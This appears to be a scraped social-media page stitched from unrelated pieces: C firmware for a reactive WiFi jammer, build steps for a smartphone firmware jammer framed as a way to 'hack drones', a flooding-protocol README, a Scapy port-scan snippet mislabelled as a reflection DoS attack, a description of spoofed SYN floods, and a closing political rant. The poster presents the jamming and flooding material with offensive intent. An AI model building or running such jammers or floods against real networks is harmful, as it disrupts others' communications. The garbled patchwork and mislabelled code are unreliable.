pizza coming out!

1. // Xilinx SDK includes
2. #include "xparameters.h"
3. #include
4. #include
5. #include "xtmrctr.h"
6. #include "xio.h"
7. #include
8.  
9. // WARP includes
10. #include "wlan_mac_low.h"
11. #include "w3_userio.h"
12. #include "radio_controller.h"
13.  
14. #include "wlan_mac_ipc_util.h"
15. #include "wlan_mac_802_11_defs.h"
16. #include "wlan_mac_misc_util.h"
17. #include "wlan_phy_util.h"
18. #include "wlan_mac_jamming.h"
19.  
20. #include "wlan_exp.h"
21. #include "math.h"
22.  
23.  
24. /*************************** Constant Definitions ****************************/
25.  
26. #define WARPNET_TYPE_80211_LOW         WARPNET_TYPE_80211_LOW_JAMMING
27. #define NUM_LEDS                       4
28.  
29. // Wifi channel, where the jammer should operate on
30. #define WIFI_CHANNEL                   14
31.  
32. // Packet buffer used to hold the jamming frame
33. #define TX_PKT_BUF_JAM                 7
34.  
35. /*********************** Global Variable Definitions *************************/
36.  
37.  
38. /*************************** Variable Definitions ****************************/
39. static u8                              eeprom_addr[6];
40. static u8                              jamming;
41. static u8                              showmacs;
42.  
43. volatile u8                            red_led_index;
44. volatile u8                            green_led_index;
45.  
46. /**************************** Struct Definitions *****************************/
47. typedef struct{
48.     u8 dsap;
49.     u8 ssap;
50.     u8 control_field;
51.     u8 org_code[3];
52.     u16 type;
53. } llc_header;
54.  
55. #define LLC_SNAP                        0xAA
56. #define LLC_CNTRL_UNNUMBERED            0x03
57.  
58.  
59. static u8                               OURMAC[6] = {0xDE,0xAD,0xBE,0xEF,0x01,0x01};
60. static u8                               JAMMAC[6] = {0xDE,0xAD,0xBE,0xEF,0x11,0x11};
61. /******************************** Functions **********************************/
62.  
63. inline void set_tx_power(u8 tx_pkt_buf, s8 power) {
64.     tx_frame_info* mpdu_info = (tx_frame_info*) (TX_PKT_BUF_TO_ADDR(tx_pkt_buf));
65.     mpdu_info->params.phy.power = power; // dBm
66. }
67.  
68. inline void set_tx_ant_mode(u8 tx_pkt_buf, u8 antenna_mode) {
69.     tx_frame_info* mpdu_info = (tx_frame_info*) (TX_PKT_BUF_TO_ADDR(tx_pkt_buf));
70.     mpdu_info->params.phy.antenna_mode = antenna_mode;
71. }
72.  
73. int main(){
74.  
75.     wlan_mac_hw_info* hw_info;
76.     xil_printf("\f");
77.     xil_printf("----- SEEMOO Reactive WiFi Jammer -------\n");
78.     xil_printf("----- v0.1 ------------------------------\n");
79.     xil_printf("----- wlan_mac_jamming ------------------\n");
80.     xil_printf("Compiled %s %s\n\n", __DATE__, __TIME__);
81.  
82.     xil_printf("Note: this UART is currently printing from CPU_LOW. To view prints from\n");
83.     xil_printf("and interact with CPU_HIGH, raise the right-most User I/O DIP switch bit.\n");
84.     xil_printf("This switch can be toggled live while the design is running.\n\n");
85.  
86.     wlan_tx_config_ant_mode(TX_ANTMODE_SISO_ANTA);
87.  
88.     red_led_index = 0;
89.     green_led_index = 0;
90.     userio_write_leds_green(USERIO_BASEADDR, (1<<green_led_index));
91.     userio_write_leds_red(USERIO_BASEADDR, (1<<red_led_index));
92.  
93.     wlan_mac_low_init(WARPNET_TYPE_80211_LOW);
94.  
95.     hw_info = wlan_mac_low_get_hw_info();
96.     memcpy(eeprom_addr,hw_info->hw_addr_wlan,6);
97.  
98.  
99.     wlan_mac_low_set_frame_rx_callback((void*)frame_receive);
100.     wlan_mac_low_set_frame_tx_callback((void*)frame_transmit);
101.  
102.     wlan_mac_low_finish_init();
103.  
104.     REG_SET_BITS(WLAN_MAC_REG_CONTROL, (WLAN_MAC_CTRL_MASK_CCA_IGNORE_PHY_CS | WLAN_MAC_CTRL_MASK_CCA_IGNORE_NAV));
105.  
106.     // Set the WiFi channel
107.     if(radio_controller_setCenterFrequency(RC_BASEADDR, (RC_ALL_RF), RC_24GHZ, wlan_mac_low_wlan_chan_to_rc_chan(WIFI_CHANNEL)) >= 0) {
108.         xil_printf("WiFi Channel set to %d\n", WIFI_CHANNEL);
109.     } else {
110.         xil_printf("ERR: Setting the WiFi channel resulted in an error\n");
111.     }
112.  
113.     xil_printf("Initialization Finished\n");
114.  
115.  
116.  
117.     while(1){
118.  
119.         //Poll PHY RX start
120.         wlan_mac_low_poll_frame_rx();
121.  
122.         //Should check and handle push button events
123.         //push_button_checker();
124.     }
125.     return 0;
126. }
127.  
128.  
129.  
130.  
131. /**
132.  * @brief Checks which push button is pressed and calls functions to handle this event
133.  */
134. inline void push_button_checker() {
135.  
136.     if(userio_read_inputs(USERIO_BASEADDR) == W3_USERIO_PB_D){
137.  
138.  
139.         //xil_printf("FRAME PREPARE");
140.  
141.             mac_header_80211* header = (mac_header_80211*)(TX_PKT_BUF_TO_ADDR(0)+PHY_TX_PKT_BUF_PHY_HDR_SIZE+sizeof(tx_frame_info));
142.  
143.             header->frame_control_1 = MAC_FRAME_CTRL1_SUBTYPE_DATA;
144.             header->frame_control_2 = MAC_FRAME_CTRL2_FLAG_FROM_DS;
145.             header->duration_id = 0;
146.             header->sequence_control = 0;
147.  
148.             //header->address_1 = OURMAC;
149.             memcpy(header->address_1, OURMAC, 6);
150.             memcpy(header->address_2, OURMAC, 6);
151.             memcpy(header->address_3, OURMAC, 6);
152.  
153.             set_tx_power(0,TX_POWER_MAX_DBM);
154.             set_tx_ant_mode(0,TX_ANTMODE_SISO_ANTA);
155.  
156.             frame_transmit(0,WLAN_PHY_RATE_BPSK12,(u16) 1000,NULL);
157.  
158.             xil_printf("FRAME SENT");
159.  
160.             while(userio_read_inputs(USERIO_BASEADDR) == W3_USERIO_PB_D){
161.                 //do nothing
162.             }
163.         }
164.  
165.     if(userio_read_inputs(USERIO_BASEADDR) == W3_USERIO_PB_U){
166.         xil_printf(".");
167.  
168.         while(userio_read_inputs(USERIO_BASEADDR) == W3_USERIO_PB_U){
169.             //do nothing
170.         }
171.     }
172.  
173.  
174.  
175.  
176.  
177. }
178.  
179. /**
180.  * @brief Handles reception of a wireless packet
181.  *
182.  * This function is called after a good SIGNAL field is detected by either PHY (OFDM or DSSS)
183.  * It is the responsibility of this function to wait until a sufficient number of bytes have been received
184.  * before it can start to process those bytes. When this function is called the eventual checksum status is
185.  * unknown. In NOMAC, this function doesn't need to do any kind of filtering or operations like transmitting
186.  * an acknowledgment.
187.  *
188.  * @param u8 rx_pkt_buf
189.  *  -Index of the Rx packet buffer containing the newly recevied packet
190.  * @param u8 rate
191.  *  -Index of PHY rate at which pcaket was received
192.  * @param u16 length
193.  *  -Number of bytes received by the PHY, including MAC header and FCS
194.  * @return
195.  *  - always returns 0 in NOMAC implementation
196.  */
197.  
198.  
199. u32 frame_receive(u8 rx_pkt_buf, u8 rate, u16 length){
200.     //This function is called after a good SIGNAL field is detected by either PHY (OFDM or DSSS)
201.     //It is the responsibility of this function to wait until a sufficient number of bytes have been received
202.     // before it can start to process those bytes. When this function is called the eventual checksum status is
203.     // unknown. The packet contents can be provisionally processed (e.g. prepare an ACK for fast transmission),
204.     // but post-reception actions must be conditioned on the eventual FCS status (good or bad).
205.     //
206.     // Note: The timing of this function is critical for correct operation of the 802.11 DCF. It is not
207.     // safe to add large delays to this function (e.g. xil_printf or usleep)
208.  
209.  
210.     mac_header_80211* header = (mac_header_80211*)(RX_PKT_BUF_TO_ADDR(rx_pkt_buf)+PHY_RX_PKT_BUF_PHY_HDR_SIZE+sizeof(rx_frame_info));
211.  
212.     while(wlan_mac_get_last_byte()<=13+6){
213.         //DO NOTHING
214.     }
215.  
216.     if(wlan_addr_eq(header->address_1,JAMMAC)){
217.         mac_header_80211* header = (mac_header_80211*)(TX_PKT_BUF_TO_ADDR(0)+PHY_TX_PKT_BUF_PHY_HDR_SIZE+sizeof(tx_frame_info));
218.  
219.         header->frame_control_1 = MAC_FRAME_CTRL1_SUBTYPE_DATA;
220.         header->frame_control_2 = MAC_FRAME_CTRL2_FLAG_FROM_DS;
221.         header->duration_id = 0;
222.         header->sequence_control = 0;
223.  
224.         //header->address_1 = OURMAC;
225.         memcpy(header->address_1, OURMAC, 6);
226.         memcpy(header->address_2, OURMAC, 6);
227.         memcpy(header->address_3, OURMAC, 6);
228.  
229.  
230.         set_tx_power(0,TX_POWER_MAX_DBM);
231.         set_tx_ant_mode(0,TX_ANTMODE_SISO_ANTA);
232.  
233.         frame_transmit(0,WLAN_PHY_RATE_BPSK12,(u16) 1000,NULL);
234.  
235.  
236.         //xil_printf("Address: %x:%x:%x:%x:%x:%x \n",header->address_1[0],header->address_1[1],header->address_1[2],header->address_1[3],header->address_1[4],header->address_1[5]);
237.     }
238.  
239.  
240.  
241.     u32 state = wlan_mac_dcf_hw_rx_finish(); //Blocks until reception is complete
242.  
243.     //xil_printf("Address: %x:%x:%x:%x:%x:%x \n",header->address_1[0],header->address_1[1],header->address_1[2],header->address_1[3],header->address_1[4],header->address_1[5]);
244.  
245.  
246.  
247.     if(state == RX_MPDU_STATE_FCS_GOOD){
248.         green_led_index = (green_led_index + 1) % NUM_LEDS;
249.         userio_write_leds_green(USERIO_BASEADDR, (1<<green_led_index));
250.     } else {
251.         red_led_index = (red_led_index + 1) % NUM_LEDS;
252.         userio_write_leds_red(USERIO_BASEADDR, (1<<red_led_index));
253.     }
254.  
255.  
256.     // Clear packet buffer for debugging reasons
257.     bzero((void *)(RX_PKT_BUF_TO_ADDR(rx_pkt_buf)), 2048);
258.  
259.  
260.     // Set the OFDM and DSSS PHYs to use the same Rx pkt buffer
261.     wlan_phy_rx_pkt_buf_ofdm(rx_pkt_buf);
262.     wlan_phy_rx_pkt_buf_dsss(rx_pkt_buf);
263.  
264.     //Unblock the PHY post-Rx (no harm calling this if the PHY isn't actually blocked)
265.     wlan_mac_dcf_hw_unblock_rx_phy();
266.  
267.  
268.     return 0;
269. }
270.  
271. /**
272.  * @brief Handles transmission of a wireless packet
273.  *
274.  * This function is called to transmit a new packet via the PHY. While the code does utilize the wlan_mac_dcf_hw core,
275.  * it bypasses any of the DCF-specific state in order to directly transmit the frame. This function should be called once per packet and will return
276.  * immediately following that transmission. It will not perform any DCF-like retransmissions.
277.  *
278.  * This function is called once per IPC_MBOX_TX_MPDU_READY message from CPU High. The IPC_MBOX_TX_MPDU_DONE message will be sent
279.  * back to CPU High when this function returns.
280.  *
281.  * @param u8 rx_pkt_buf
282.  *  -Index of the Tx packet buffer containing the packet to transmit
283.  * @param u8 rate
284.  *  -Index of PHY rate at which packet will be transmitted
285.  * @param u16 length
286.  *  -Number of bytes in packet, including MAC header and FCS
287.  * @param wlan_mac_low_tx_details* low_tx_details
288.  *  -Pointer to array of metadata entries to be created for each PHY transmission of this packet (eventually leading to TX_LOW log entries)
289.  * @return
290.  *  -Transmission result
291.  */
292. int frame_transmit(u8 pkt_buf, u8 rate, u16 length, wlan_mac_low_tx_details* low_tx_details) {
293.     //This function manages the MAC_DCF_HW core.
294.  
295.     u32 tx_status;
296.     tx_frame_info* mpdu_info = (tx_frame_info*) (TX_PKT_BUF_TO_ADDR(pkt_buf));
297.     u64 last_tx_timestamp;
298.     int curr_tx_pow;
299.     last_tx_timestamp = (u64)(mpdu_info->delay_accept) + (u64)(mpdu_info->timestamp_create);
300.  
301.     //Write the SIGNAL field (interpreted by the PHY during Tx waveform generation)
302.     wlan_phy_set_tx_signal(pkt_buf, rate, length);
303.  
304.     unsigned char mpdu_tx_ant_mask = 0;
305.     switch(mpdu_info->params.phy.antenna_mode) {
306.         case TX_ANTMODE_SISO_ANTA:
307.             mpdu_tx_ant_mask |= 0x1;
308.         break;
309.         case TX_ANTMODE_SISO_ANTB:
310.             mpdu_tx_ant_mask |= 0x2;
311.         break;
312.         case TX_ANTMODE_SISO_ANTC:
313.             mpdu_tx_ant_mask |= 0x4;
314.         break;
315.         case TX_ANTMODE_SISO_ANTD:
316.             mpdu_tx_ant_mask |= 0x8;
317.         break;
318.         default:
319.             mpdu_tx_ant_mask = 0x1;
320.         break;
321.     }
322.  
323.     mpdu_info->num_tx = 1;
324.  
325.     curr_tx_pow = wlan_mac_low_dbm_to_gain_target(mpdu_info->params.phy.power);
326.  
327.     wlan_mac_MPDU_tx_params(pkt_buf, 0, 0, mpdu_tx_ant_mask);
328.  
329.     //Set Tx Gains
330.     wlan_mac_MPDU_tx_gains(curr_tx_pow,curr_tx_pow,curr_tx_pow,curr_tx_pow);
331.  
332.     //Before we mess with any PHY state, we need to make sure it isn't actively
333.     //transmitting. For example, it may be sending an ACK when we get to this part of the code
334.     while(wlan_mac_get_status() & WLAN_MAC_STATUS_MASK_PHY_TX_ACTIVE){}
335.  
336.     //Submit the MPDU for transmission - this starts the MAC hardware's MPDU Tx state machine
337.     wlan_mac_MPDU_tx_start(1);
338.     wlan_mac_MPDU_tx_start(0);
339.  
340.     //Wait for the MPDU Tx to finish
341.     do{
342.         if(low_tx_details != NULL){
343.             low_tx_details[0].phy_params.rate = mpdu_info->params.phy.rate;
344.             low_tx_details[0].phy_params.power = mpdu_info->params.phy.power;
345.             low_tx_details[0].phy_params.antenna_mode = mpdu_info->params.phy.antenna_mode;
346.             low_tx_details[0].chan_num = wlan_mac_low_get_active_channel();
347.             low_tx_details[0].num_slots = 0;
348.             low_tx_details[0].cw = 0;
349.         }
350.         tx_status = wlan_mac_get_status();
351.  
352.         if(tx_status & WLAN_MAC_STATUS_MASK_MPDU_TX_DONE) {
353.             if(low_tx_details != NULL){
354.                 low_tx_details[0].tx_start_delta = (u32)(get_tx_start_timestamp() - last_tx_timestamp);
355.                 last_tx_timestamp = get_tx_start_timestamp();
356.             }
357.  
358.             switch(tx_status & WLAN_MAC_STATUS_MASK_MPDU_TX_RESULT){
359.                 case WLAN_MAC_STATUS_MPDU_TX_RESULT_SUCCESS:
360.                     return 0;
361.                 break;
362.             }
363.         }
364.     } while(tx_status & WLAN_MAC_STATUS_MASK_MPDU_TX_PENDING);
365.  
366.     return -1;
367. }

[C] jamming_lab - Pastebin.com

PASTEBIN.COM

Smartphone-Based Jamming using Arbitrary Waveforms

first code for jamming drones is

To compile the source code, you are required to first checkout a copy of the original nexmon repository that contains our C-based patching framework for Wi-Fi firmwares. That you checkout this repository as one of the sub-projects in the corresponding patches sub-directory. This allows you to build and compile all the firmware patches required to repeat our experiments. The following steps will get you started on Xubuntu 16.04 LTS:

1. Install some dependencies: sudo apt-get install git gawk qpdf adb
2. Only necessary for x86_64 systems, install i386 libs:

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386

3. Clone the nexmon base repository: git clone https://github.com/seemoo-lab/nexmon.git.
4. Checkout tag 2.2.1 as branch wisec2017: git checkout tags/2.2.1 -b wisec2017. Tag 2.2.1 ensures compatibility with this repository.
5. Download and extract Android NDK r11c (use exactly this version!).
6. Export the NDK_ROOT environment variable pointing to the location where you extracted the ndk so that it can be found by our build environment.
7. Navigate to the previously cloned nexmon directory and execute source setup_env.sh to set a couple of environment variables.
8. Run make to extract ucode, templateram and flashpatches from the original firmwares.
9. Navigate to utilities and run make to build all utilities such as nexmon.
10. Attach your rooted Nexus 5 smartphone running stock firmware version 6.0.1 (M4B30Z, Dec 2016).
11. Run make install to install all the built utilities on your phone.
12. Navigate to patches/bcm4339/6_37_34_43/ and clone this repository: git clone https://github.com/seemoo-lab/wisec2017_nexmon_jammer.git
13. Enter the created subdirectory wisec2017_nexmon_jammer and run make install-firmware to compile our firmware patch and install it on the attached Nexus 5 smartphone.

https://github.com/seemoo-lab/wisec2017_nexmon_jammer

welcome back to war! "Robust Flooding using Back-to-Back Synchronous Transmissions with Channel-Hopping" let's hack drones...

Robust Flooding using Back-to-Back Synchronous Transmissions with Channel-Hopping

Scenario

A binary event has to be communicated from a source node to a sink node over a multi-hop wireless network. This communication has to involve intermediate nodes, since source and sink are not within communication range of each other. At the same time, jammers create interference in the frequency bands used for wireless communication. The solution should be energy efficient, reliable and provide low latency. A more detailed description can be found on the competition webpage [1].

Protocol Description

This protocol uses periodic rounds of floods to propagate information in a multi-hop network. Every flood consists of consecutive (back-to-back), synchronous transmissions. Once a packet is received, nodes use a local timeout to schedule a transmission in the next slot. In the case of a blocked channel, information is not propagated. However, in the following slot, the flood can continue at the same progress level. This is different to the approach of Glossy [2], which requires for every sent packet a preceeding packet reception in order to maintain tighly aligned, synchronous transmissions. More information about the protocol can be found in the slides in doc/slides or in [3].

How to use it

Following key parameters can be set in the Makefile for the depcomp app:

GLOSSY_PERIOD_MS Interval of floods in milliseconds. Tested values: 25, 50, 100, 200

N_TX Number of transmissions per node in a flood.

N_CH Number of different channels to use.

SLEEP_BTW_EVENTS Set to 1 to enable the round skipping feature. If enabled, rounds following an event are skipped in order to save energy. This is only safe if the minimal interval between events is known (e.g., 2 seconds in the competition).

To run this code on FlockLab [4], set the DEFINES in the Makefile as follows:

DEFINES=COMPETITION_MODE=0,TINYOS_NODE_ID=1,GLOSSY_PERIOD_MS=50,N_TX=6,N_CH=6,SLEEP_BTW_EVENTS=1,USE_LIGHT_SENSOR=0

This allows to generate events on the initiator node using the GPIO actuation feature of FlockLab (i.e. by toggling the SIG1 pin).

https://github.com/ETHZ-TEC/robust-flooding

NEW GENERATION OF DOS ATTACK "DISTRIBUTED REFLECTION"

Understand what I'm doing : Upon reception of the SYN packet, it generates its own SYN....that's "reflective" 

# Generate Port Number
srcport = RandShort()

# Send SYNC and receive RST-ACK or SYN-ACK
SYNACKpkt = sr1(IP(dst=target) /
TCP(sport=srcport, dport=port, flags="S"))

# Extract flags of received packet
pktflags = SYNACKpkt.getlayer(TCP).flags

if pktflags == SYNACK:
# port is open
pass
else:
# port is not open
# ...
pass

our code..we just want that previouse post few lines..

[Python] Stealth Port Scanner (Scapy and Python) - Pastebin.com

PASTEBIN.COM

https://pastebin.com/YCR3vp9B

welcome back to war! Let's move tribe! "This method of attack follow...The spoofed IP could be that of an unsuspecting personal computer or high powered server. For this example we will assume the latter.
First our attacker launches a spoofed SYN flood onto its target. The target (a server) begins to take on connections and responds to the SYN with an ACK. However, since the IP is spoofed, our target server sends a flood of ACKs to the actual server for which the spoofed IP belongs. The target server being unaware of the events that have unfolded upon its behalf; responds with a flood of RST packets for each of the ACKs it has received. Consequently, what started as a single sourced SYN attack has now become a two vector SYN and RST attack. The second source being completely innocent in the hostile intent it has now conducting upon the target."

My friends! I decided to live a different life, even if my path was modify but "different" circumstances! So, I will also, die, as different from the rest . I do politics being totally tax free, without no payment, and in totally freedom of thinking and speech! I would never belong to no "group", submitted by lobbies, or by asking permission for my own opinions! The "all picture" that some few, very few, can actually see, is that the all planet is made of hypocrisy, politicalhypocrisy!!! Politics should be free, like old Greek philosophy!!! The one's who join the "system", accepting being payed, for what they think is the representation of the People, are only hypocrites! What I find sui generis, is that in my house, politics are discussed every day, but the "system" takes our visions, our ideas, and makes them their own...and by that, they go to the television, and incredibly...are payed...and extraordinary payed...those like me, that oppose to all hypocrisy of this world, have files, everywhere, written by their sheeps. We give the argument of their wage, the argument of their slavery and maids they are! Today, we at my house, found funny, the new aeroport project, came first (on purpose) to the press, awaiting for my opinion!!! my decision! Like many other, I've took, trough the years! My activity, even if not payed, non profit, without no banking investment, is high security. I live of my activity, and what I receive, is consideration, credibility, and respect! Surely, I'm not going to pronounce about the aeroport affair. I'm so sorry, I will never again, feed thieves, and hypocrites!